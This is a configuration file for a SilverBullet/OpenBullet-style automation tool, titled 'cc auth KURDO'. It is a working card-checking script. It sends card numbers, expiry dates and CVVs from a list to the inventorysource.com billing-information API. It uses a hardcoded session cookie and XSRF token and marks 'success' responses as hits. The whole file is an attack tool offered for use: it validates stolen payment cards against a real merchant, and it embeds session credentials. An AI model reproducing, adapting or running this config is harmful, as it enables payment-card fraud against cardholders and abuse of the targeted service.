[SETTINGS]
{
  "Name": "cc auth Kurdo,
  "SuggestedBots": 2,
  "MaxCPM": 0,
  "LastModified": "2024-03-04T08:28:27.5410896-08:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@iakurdo | @CC_KRD",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "cc auth KURDO",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://app.inventorysource.com/api/account/billing-information" 
  CONTENT "{\"number\":<CN>,\"exp_month\":\"<MO>\",\"exp_year\":\"<YE>\",\"cvc\":\"<CVV>\",\"name\":\"afsgfsdg sgretg\",\"zip\":\"90001\"}" 
  CONTENTTYPE "application/json" 
  HEADER ": scheme: https" 
  HEADER "accept: application/json, text/plain, */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9,ar;q=0.8" 
  HEADER "app-id: 1702975608000" 
  HEADER "content-type: application/json;charset=UTF-8" 
  HEADER "cookie: JSESSIONID=EA9BE3DDAC50795FE93794D8671DAAE5; XSRF-TOKEN=e3891fe1-a1e7-4f78-ad87-1034b38ae7ee; _uetsid=b5570960da4111eeb2ed8920b40df824; _uetvid=b5572860da4111ee9544df2d98dec8b3; _ga=GA1.2.667776217.1709568625; _gid=GA1.2.1078998097.1709568625; _fbp=fb.1.1709568625513.1596327591; _clck=9a5qhr%7C2%7Cfjs%7C0%7C1524; __hstc=94581443.9d322024e463e79ea5cace923fb45e14.1709568626613.1709568626613.1709568626613.1; hubspotutk=9d322024e463e79ea5cace923fb45e14; __hssrc=1; __hssc=94581443.1.1709568626613; _clsk=1ilbzlz%7C1709568627009%7C1%7C1%7Cq.clarity.ms%2Fcollect; _gcl_au=1.1.868049896.1709568623.1814463136.1709568868.1709568873; _gat=1; _ga_KRBQCF9746=GS1.2.1709568626.1.1.1709568874.60.0.0" 
  HEADER "origin: https://app.inventorysource.com" 
  HEADER "referer: https://app.inventorysource.com/" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"109\", \"Not_A Brand\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "uid: 2729993" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 
  HEADER "x-xsrf-token: e3891fe1-a1e7-4f78-ad87-1034b38ae7ee" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "\"success\":true," 
  KEYCHAIN Failure OR 
    KEY "\"success\":false," 

PARSE "<SOURCE>" LR "" "" CreateEmpty=FALSE -> CAP "Res" 

